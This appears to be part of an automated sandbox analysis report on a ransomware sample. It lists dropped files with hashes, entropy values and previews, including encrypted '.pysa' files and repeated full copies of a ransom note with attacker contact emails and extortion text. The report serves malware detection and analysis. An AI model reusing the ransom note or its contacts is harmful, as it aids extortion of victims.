                  Preview: N_........N.B.'..F.:x.A.gX...F/{o..W....I.7.c...uHNrMc.6.n.|.....I7^#P.KC.Ow...(..?...~.}......(...u&.Gf [..=..].....h.X.........oQF... 8.|......o..B.c...d....~M-...."... jR...lV.w.#.%....]..G/k>?|p...km6...f....DU...`.JM..E.kc...x.7)"d).p.J-.x.D...F..{'..../...0.1u..8.Ue.*......+7=}.-..!K...o.mm.\%..".G<{A..M.;.....n..cf..?..,#.>......!.2.Yc.V......m.^gx.Y..(,...<.=..H..;.....j...Z..M.[...(9.u...'{...j...P{..)...".6z....F)...%.C.,.m..,a.....KU.*hB'k....v.s..@..;r.[.v..W..P~'.v.s....N./...fT_..h..$.Q~.G...jL..<.=;..].R..Es.......*..H...0e.&EW0xl..*.?.q..\1.-.........P.w...)...C...g..[]s.{.}v....4l...H.C..,-..f.......w..b........04RO...i.J.C.n.L......a!....`...5...._...r.h..N.._.a...,.e.BG{......(Sr{(?.....d.x#..G-.E...Bz.{...Ka.).h.'.V...=:Z.d..;.3.......r^,.....3T..$...o.".Y7.....`Y...e.t.....h..~........s..M..t1/q...N.l....<..I.^xRDw).p0.].T.....t......jM.....Vy.h...5...eY....'.^..I..`B......X..ZK...2.T.|.U....(.C.z..u......HB.`]O..
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.007.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.13649858762453
                  Encrypted:false
                  SSDEEP:96:bTmjGWJKUncsnEILLpzdRP1DAt8pUy2ADTUJ1HBP1OXNx/nDmX+IkGt7ptuzNiwO:vmxjncsttzvyt8pv2Z1HB9OXNxfJfGFD
                  MD5:7BAB1B164F2AD569A1512E6BB7D4E4F4
                  SHA1:D47CEC527DD47241F3995CC92BDBFF314EE51084
                  SHA-256:ABE135A4036099B7A6839A86DDE006319BBDBB758C85AB906ECCE0B4F622A410
                  SHA-512:4E1651AC5B599F8D857B5F37E8B73D2731065D9F023B18E6A484DEE357B6D64F3C285129DBA301D7A008402836720B1A72750C57F661E7F28FFFE479550866A7
                  Malicious:false
                  Preview: .!...../D...'X3...aH...+.........w...o:..y....c.....F...0.:,....%z......b....I6`......Pe..]~..-[.n.....x..z.zz.s..l-...C.!.J.^. ..t....#K_.|=..k..+^~3..3....Ui4..G..EFc.W".s..t.x9^5a.z`..6..v/.g....x.............7...$y.<..xe..X_....h..A.Oj......c....c.Q.F..wv.E~.8QU..H.z...`.~K..D...rk...P.U'..."z.[Y..<!..>.S.:..).."..|.K.5.FK........?...<......&..IV....4.P.Z'....i...Zay3.m$......f.`...d.]8.N..5.....C....Z.5{.r.I..?H......}H..+].|1u....Uc.m....r_.O.N..t.RP..';0YN....w......v....;..2...R.X../]3m...z....V$&..s..5.%u=IRE..1..F>].TW.....a2..o..a..u.Y.....F......Q.c...p...>A..........9....E.P.....T~.....z.4........9R.V.....&.0{;Uv....N..3..N...J/..-.X.X.z...+I........S.U...&]....V...=w......B..m.Z.4K.F.=...;f.......k......d.....(.M G..;....T$^.......e;w......<...y.:..r.(`..bu"5zeq".;.YR...)....omM\\..6._.p..o.z"....|.........3..M.....yc\..6"Q..A...7..sD..N...._..R../.7.T...+......._.(*. .>.^\...e..............HD..[..t.(6:...P....D...
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.008.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.117701260310343
                  Encrypted:false
                  SSDEEP:96:q3ZpXMev3pZrru1YuQIMoD9wLzVcGWJj2l6tuA856WDle2uqiFH0fyLh:qXvRZnxVCwE2lc4duqiFKGh
                  MD5:EBCC368FEBB1A88E49AE83F26D50A8D7
                  SHA1:F7A1B514FA2A3B2B166F46ABD8EE7B17053F0E7F
                  SHA-256:933ED78B444170EBFC1430B34B5C9CD3CA715A0951F80A83ACA480F2BD6201A3
                  SHA-512:22715CA580CD6F2F8ACE7C68E9CC3C55173067E72E6B11EB2846872D002785F350BF4177409D76C854D6ADE31B36B9803715BDA4D2183064CB55A274E078DF56
                  Malicious:false
                  Preview: .....#.5.W.X.B....:9.4.0....7\1..xC.a"}.J....y.......9.,...W-.{.j)53M-......O...@..w.....;.m.".6Z....R..JB7..5.f.8....k....6G...2;.......X|...<m:..0.Ug#.f.D....B..b..3.3H..iU).-$/....>..(......=.4...Q..".M.....ll.<h...P..]#.s.........OMd..E[.........i7.%..v...rj>".b...l.rE.y...y..:G..f.t.w.LY.1/{m..o#l..0....*.3.<...U..pB.).R|..E..o...............y.O.....&.Z.2..........b.{.....5...9.J.v..j b^.e0o...A......~..E.*..9.....5A..2....e:....j......Pc....Bf....b.Tf^@.@W?.Xh...j....b....-x.RMpt.G68..T.nd.....f?zPA&....hXq..R.7kA.)..A..5C..B..L.&.......y.>..8........,.?........~..&...y.o...J..71...Z-C'......:0.BS..&+...I...d>o!......$.....o.s.<4p~...-,..C*...ah..=....W..!cW.U*.2.g......x4....JEU..&..6.j!.4.%MYW..yQA.\..~..:_q-.......kXG.z..........?.t$6..a.P......7V..X6....$...A..........c...N.Nl..:....#.7..W...YZ...w.......y.+e)...k..1!...Z.N......6-.../J.I"Z..[.!|M ....=.......Zw......u,.......;..7....^....D.,..........K..C...2.dd_.U..3.~..qk
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.009.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.158525738456052
                  Encrypted:false
                  SSDEEP:96:d6z5i7EowQ2aIvfAe4DJ/1F4i+9TQsG6IcUIKne4a4w2q6YM6bI/AJp06Guwzggr:8iLwQ2fnJ4DJ/4tQ56ce4a4OS/oz0nP1
                  MD5:04E4AB31BC18DD717630E548766C2955
                  SHA1:56689C507D82CD7B37FECE85A7B3CDF29B157D6A
                  SHA-256:1927E5C6DB140EFC1D212CE9B8CAA30CCA1B62CF438B323A5F20DC222BBEB4DA
                  SHA-512:E3B86357DBDD5FA1A36545CB4891AC8D5077C5CB122C820A1EA38584AAE38DA62004B744CF65F2BA7EAD27D4AB7B8F4EA1B631F26D715EF4D6499528D6A45D1A
                  Malicious:false
                  Preview: !L.Z._.En...x...5..y.....s."..x...E.2.....U.V...B...U'...A....L....3..F..+..,*y.9U....I.q......[.....R.a.HU2.&.8G.@$..._.Z..........<?....N\M....0Id.p%Qr.WL9.......&. .qU...#....esR?.lwVV.......6.a.k.'^.U.H...Y..G$`uZ.=.Lvzu..QJ.:.S./b.o....\..... ....=;..le..nb.Q...BguV.....[.s1.a.......G.. ..IxT.........L...........R|......69.I.E....lu.Ma....2.+....h..!.9HM.O.6...=...J......g.....n..........(...........f6.}...CN....x..n.Q?...BL....iw....U..........E....S....W.MX...d.w!x....%~..[{f..`:..:..b..rz..a........y.iK.....*.An...m...b......'.duZ~8.gN@....6:...@...q..:G....$....C............k..e[z.;..>.k...ZP.....}.V...(0.r..a...P..M..G):..f..i.{qre4..jD.[.g.l.a.....u$m.6%..........~..P.M..c#.z....Cv1.^....a...O..O$m.f.....N.j......]gNv..w..M. ....u.G8.?.ky...)..l..R....5.6vP8..l.[...........GL...'.M.SD......X.?.#...w...Z(...Fq..d...I.3.~...Zx8a...d0.....`.g..PM...8K.sGp...Jr..k)...AH...*c.@..L.\.. .. ...-X.U.M$|.7>L..8..^..2{.{..K]
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.010.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.151196510050001
                  Encrypted:false
                  SSDEEP:96:9lOW1/3L5aOdQ5PFD6SNT2CBMaV/zmSaksRFS0OIN1Df7gQqB8pW4sl:DvQPltNT2ClRmAsRFSoN1D0QqF
                  MD5:4B433EADA384EAB34675FA1F7B8E49BF
                  SHA1:3E0B9B455F4152B8230A204F5DEBADB93526C7F0
                  SHA-256:347DD1E309E430B2008F76F876955A26876382B71EB93B2FF272A5E59D5D6D67
                  SHA-512:9E3E76CBD38E9781E6D13854ECDA2A041AF05ADE211268D001B2FE23606ADF940E02A67E1FD4894BCB1E74A53E2079261174E3E845088CE27F5C917D34F65A00
                  Malicious:false
                  Preview: .ij9..8,|.s..d.....'.GM..z...65....k..A...._.{si.'..+.@..I.~.H..=5.!.]G.}./.P......?.Y.yN.wl....e79..I..5.d=...?B..|.xv.......B@W.......x]...&..B......'.O....Y........P.3.....z.....Wk.W...7.lB|..pUq..+I..o.-#..5<!.T...8.[.....i8....fpl.O.J~S[e}..:.x.X...6K.D.Q|e...B..q...t....NQc..D/.,!8Z../?q...[............K.......^...8h.....v-.;.+n.~{.F.itN.{E.\9....|..|$r.-.*v...O...W...,.qV.!......4O.sw..72..F....E6.(.Tm......<..F...".r.1....Y.h.....T..f.U......G.Z~.q...Q.....1.1n0[...a.c:..N..A........E-.~.bu_u.U..._.[S..4c.>#................JU........: .3..b....p..I.@3..)pI(..$.@..SI!..eR..^...1...n...2....IA.f..u.1.Gd...~K..)d.<w......}. .Rp..ii...q..q.o.*t....!G.wN~.......!+..[.>@..]..N.=..-_.H.....vS(.z|"A./...L&.....x!CVf......i.|..Y..i,^..c.a....M....#/M...N..o~......$.S.}.nL..U...4.W>..]yT...=%.u...8`w.+.....3i..05..=.).z...K......)Ey.i4d.Y..`..B./.....E..=.....L...*YX&j.l..jCLH...?..z....C...b.W.o...U..d"..y.`.x9..h.i?%BZ9A.+e}.'.!..P....P."U:B...?....0
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.011.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.133692727219115
                  Encrypted:false
                  SSDEEP:96:8f3ZQqX3cBGyUZzgqK8Bw/+rlXoX+P/FTXt02ulYVXKlrGJNFY1j1G:S3xXOGymgqKwwolYXs+RUsG
                  MD5:9AEE3454DBF3F6141BB124828A1ED5AC
                  SHA1:183D45A0FB46E426AD87CA82B68A4C7FD1AB3D00
                  SHA-256:83C1BBBDEFC004B9374DB3701F92EB8D14260BA34A348F8060CE0C9944887BEB
                  SHA-512:FD252ACA64B7A1B9A760FEDA39E4ED3B0318892711EDEC0D5CFE1EF9B56587B1C9AEB8B3F1D6B1CC6B65AB3359A1FED4786E15C117D1BB92BA43106B5F852F86
                  Malicious:false
                  Preview: d..].?.g......2......G;:.......A...J../...h..2...*...0.m..y.e...n.j..0W!.V.^.l"..r.....9.Y..4..l(....X..d=.....R...k.M6..|i.z.9...2F2..!S.:..*.:.04..&_.rA3..N.}........(..n.-.O..0<...5.0"..k...^+L.J.>....jWj.f....]..3...L.^.8.C..yA.+_..t..B 9..9~.....l."(+.i.<]/?..j.6..=|d./....o..8}r.z.'.}..j.T....B....d..E...9m..8D;...$~......J.+.H....... J....u.....O....R.....r..p.]..G..iL,a.(2.N..>....."...'.F....fm(..S......V.VWA..o.(...i.......F=......_A......i..z...S.El....5.73.8......E .33h..1. .g..0...o.......opQ......rx..qw...M..G..........c...MBr..c...=*z6L..Y..9......B.M.M.M..!........9a;P.....C..$F..s.):+......3.b....._......sq.N...J.u.,....RN.3..;(....yat...^..H.O.....Q..........G....-...?.....49d..E...e..k=.` .#..bC.|1.`...N,.^.?....\..>....d..Y..3...\).(..b...OR...#l..Z......'.8..|E.KAWK.E..,...ac.9.....]....$#.Z..2E.T..t....a..S...J\...y.3..*...&.(..|-.%A$.fi....}.).dI..............f[.[i..L..k.l...N.hMo..c.Z...B`.P. .$..<
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.012.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.144952261967
                  Encrypted:false
                  SSDEEP:96:b6AdSz5aBXJZ6C62Axrgw3SuFHhrrfZaLqEFv9uRKMAXDHte:b67oJZ66WgZu7rZa20v9AA8
                  MD5:4ADF750805D6FFC06653D205B17EFC76
                  SHA1:843BF0E0864F77F1E9C4BD3791841749D9428B2E
                  SHA-256:BA00432548C4196E83B1A0093DDD2DF93B6DBD807A317BFB39B40E8FA38BDF86
                  SHA-512:F03F096FAAB82CCAEB30F53E0359D87C7B5A5464F4CA95C36CB473038CFF9C4E218446246805F38704A1A6212E89940E3D20607D5C7EED8EB60C4233A7C762BF
                  Malicious:false
                  Preview: ...($F.....f..v_.x.o...=.t..w.X[.R.Oq.8.PD...QP.t5,.4..^.....^k..:.....o.......2.*..-UK..)...&D.........KY.5..-/s..v\....x.h...8..7[..?,..X...0pr...#.F..w....."D.2+9.q.S..\..,. UphAN.2T....K...8{...2.f7K.F...kC. .([.f"33kdvuK)..s.ah............9*N...L...0..`...[...[.........<LF...... .&...........;lq....X.E.g7d.J6..s...6.E..H....k..k..t....S.doRB$p\.k..7......i..;...H..n...T.0.k.....N.....D..?....&....T!....`.......xZ....|}..8.....=1*...2....n..Q....0.35#.i6...gGOm..(.]k.^)pm..g+.\WN>.u.....OA....F......<..5t.)i....Ag;.....@.kk...v9.)...2..Z=.......o.Eg$.C.g..`......ji.-(.t.Zh.......[..U....i-<A.H.....5,..u....F....VQ...{.5)(..$.x..g9.>K.2#.%.|.D...J2T...I..V`n....!o.`........Y:+]5n.X_x...0x.!..(.b..h.".>..^..4.o.[.v..I..]......D..#..v....6.A..W;...)R...Z.*..SN.....#&...2.#...C.CU ....(..Z.D.S|9wD..F..8\.m.93.........y..k.{.....$..=W. yel...JY%............N.E.......x.B.R........_V(...:.1y.......$I.(\...&.x...S....:...%..0....I...o..>\
                  C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.013.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.684333435208918
                  Encrypted:false
                  SSDEEP:192:VRYMnV4ZnGVcmEb5IrhnWa9Kl1FhDVi+hsFFDUxqV:VmaV4PmEKQH/xFeFDLV
                  MD5:872E0C0DB7D8C9AD75F88D3D3E8D242F
                  SHA1:B3B08C87563DC30F77FAD9C1AA58B2472FB5F213
                  SHA-256:D46779D63B5BB3E7B64206CE802BCE586CC50A671FD6FA2F791707FFBE2924E4
                  SHA-512:805D2C2D964E0CDA9732CD0BFD0FDC3853FF1764E0393FEC87D3746DA1737F3D275F397A28C4CB39098141E953B45117631533EDCBC9318ED7990F9F5ACE2A2F
                  Malicious:false
                  Preview: .C..L ....'...!Y.....R..:/.;.vEgk)n<3=}v....-.:T.*M&j(..._..1...#.o.%..F:..1.7."v.owM.6...|...$.&.L}4.w.v/a.....`....@..P....}..\....2.s........9..?2.........l.'[...uwT#.6.X_Jr..%.z..Y.2).f.rj].....-.9Mzp.T.Q*......G"h.<.C.@.)........w.B.;.ry..]..9....L...8..V......u1.....f..zn.N_.Z......V>.......p.S...s.X.r.&.c.i.V...........c$.@..R#.i.S.nA......N....+q..q.."..tZcQY..UaaL.7...b:.....C..A..R.S....t.l..i......a!.Fs6...\...3....'CW....W.8X....&F.........P.u..8{.A..6....SI..4W.c.+.z..{`<..I...i..%.EZ.r...W.......`.jne|........%.=.ma.K"..%.y.....r5.>.X....U...Y.D..r...3...4.......D.P..Cc.vLm....S.[.\{J.Y.1....c......H`.}J\....I...._.V..K.W....8..x..Q..%.h.8.h...|.C..6G.F-k..G.`....o..ik.h./._.....a....<eR.....`.fk5.d{+....".!.Ug..`3.>....J8....(mz.....i..L.n.:.)Y...j....|.< #t.=-v?...(._..m^.I..!.k{.v.]{.9.P..:...:.H.......=>.^xvDU,.}.@.1.8......".T....M. ..[.n.a8...V..&'...O....U.....6..l..>^OGTVd.u...n..=Z...X.?..SV....d..D(...4.8z|E?..Uk
                  C:\ProgramData\USOShared\Logs\UpdateUx_Temp.1.etl.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):37888
                  Entropy (8bit):7.969238886060302
                  Encrypted:false
                  SSDEEP:768:A5ogolQsovdRSciYUWwhqgpyLOyb1CFY05qK108uyhjrLp+IWagoRCbl4Itt:A5ofQsvi6gZXbIY0548uypZ+ygoQbOIn
                  MD5:720F8BD462658070E79C8A3D23AC8FA5
                  SHA1:F496F5FB3A6C704B456B51A440F7A20BA096750C
                  SHA-256:3C269E68CC3682CE1EEA850603BC36E4200019D387AF557EB9B4F6EB233EC2A1
                  SHA-512:626D486EAF9E0E1EF3413D040F305F259AAE35CE0E8EA003ACA72FC230E41F661B8F8AAC16983FEFD34F12CF976B455414A416E312400298A66C425498545DAD
                  Malicious:false
                  Preview: X.2o.>.R:.DU........y...)...-.....n..n..?ysPZ...x..i(.nq...i..z"_.V......o.s..P.N.V...Y...Ngv.#-...R...>.8.....M.......i...2.....\..R.K.:..8E.'.v..!g.8.........:.........t.c...f.....9n...jU...~.d.......S..........;uWAS.@.K.T .f.....CJb........(Y.....#.`...?.].e.]/".^..r.m..f.?eL.|.e.X....Ti.....Ph...DS.=..oZ....\..~.....3.#.6....-..|...Z-.W:.V....[.?....N.%....M.c......h..J...c..0T.o..d..0.........`..V-i._.A8...-..B...X~@..._..W......0xd...8.1......4.G.I.\KH..*...4..f.;Q.d.b.p....6m".q1.P5..\=....P-:....0....../>1d!..9.W.[v.x.....h......Z.(A.d.SZ.t.=.>......c3..4t..S..T...1...d..Z...E...|`..7F...y......M%......._Hg,..o).GO....W.Q......Z...xC....;..>&})g..u..q.bTr..L~....%.!..d.Kl.......D*.U(... RB..7.....E.Z7.)z...{/.W`p.....(.L... ....9..^.x8.G..*...J$.3m....A....O......C..:6g.M-.....X.....o.'...T..."..Wn...h.......{p.l...}....]|.`.F.5.{tb#-...|B:.T...B.?.[^fP*.....I..i.|..F.i..>......1t.N_{7.|..iO......1..\...KW..Xf..^.....W..
                  C:\ProgramData\USOShared\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\WindowsHolographicDevices\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\WindowsHolographicDevices\SpatialStore\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\dbg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6929
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:C0A9D03A4B3295C87645F029304DD87A
                  SHA1:6D8C6048A086BE6AA2AC9EB4BC43DE151A558915
                  SHA-256:356018D7702D459465C1052494D62047F2BBA391EE1C9BC8C989715687FB59AF
                  SHA-512:79C334E2AFDC8C976310B4E8D891A61EAFB16E225BF7E3EA65742F88490AE870003F1B7F37565D874B8ED0FBE14FF005C81AFD893C073F9C4E56D2325D0F9102
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\regid.1991-06.com.microsoft\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Microsoft Office Professional Plus 2016.swidtag.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.056905560730258
                  Encrypted:false
                  SSDEEP:48:XqCjm0Cc7SdSAuD1AZ3YB7SmfoQF95gZcN2jZOpYQhHJ0nbUqY9a4NKMiZ7U:XqC6/vuDqZo5RF9yKIwppp0bUF9amKZg
                  MD5:C9512A2D9E8578D27DEEEC3DD5B57329
                  SHA1:044436EAE6D83EE9D9C49D0F15B806E1752D89FD
                  SHA-256:88398ACB0174C794F7F4C9BF923DF2087EE7EE0865774F96F90BB2C5AE0F7CA6
                  SHA-512:D209C9029A7703C16A272B8DEE79DB78FD1BCF47F6188AEF4F97A11B025EEAB00AB78CECA6E186D9499B8C40E1821C5BA7153875CA66AC1A8C8B7D8FBA3D09A0
                  Malicious:false
                  Preview: .o*._....rO.}v........4.....,.c....X..khu...k...9........q.......].IP.p.X.W.)..v)g.,.<.5C..fu.^.<.j..`9.U..Z..M._m.-.?Y.B./&..%........J.....$%.W..Xm...*...~="..o...,../%...``..V.@t.-S...X.^mDT........fb.`..E.5.L4....[W.aKMTvf..0.c..a...2....w6...T.^\.......|.O.3.g!.w...5R....U..~[...Q.. .2.......8..~.A;....e.N...<6P.K%.p..........T...'.9..#.[....1.0.X.eL....;...f.+...Y....t.k.....qY.......B....6"m..7......z......Tq.*..~.-..&..p.U.qr..[.t`.U/.o..........h...t........ZA*..s..)..0.].{.....1...A.....hD.Q..<...[.{~=...wn.2WI.......;...TL...S..\.,r..:)#.....d.........{TEA)..U3...W..j...&4.f.=..hfJs).....v.NvKbQG.]...s...#.7.f.YP&?n..e.0?...}i5.=t7.2..|...N.A.e.,.-.x.5..`.Pl..+.^..).......w,..:U....V...7..M}..$..%gzb.8..EC.V...[....g:..M.}\G....`....PGe.4...1pP..S..4.*o.7.x...x..7..X.._*)4.3S.ir..........n7..h....]..4v...m.j.....#.<%.;0o........l...[lMq|OB.i..[eE..k............a,..1..u.M_..|./(........p\.4.q].N..s.X....*...HJ...@KH..W.....e......
                  C:\Users\Default\AppData\Local\Microsoft\Windows\History\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):24518
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:384:epEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEpEF:h
                  MD5:F98E93D8471143387B95AEF89981C405
                  SHA1:1EBD38B94C8E4B24CF88F75A0AC821AB0D07AAFE
                  SHA-256:E4FD223F6241265E323D0ADA868CAB82EC17C40C10F0E1386FD6BCE5EF441CA8
                  SHA-512:5D1A7768A3C1067A4452BABE52EDA4B1B87090B57B7F88B846E7499A8F709C80EEA0309BDB835EF4F5839121E246B38EEEA749E2AF19B2FF8B80F69AD7F2B54C
                  Malicious:false
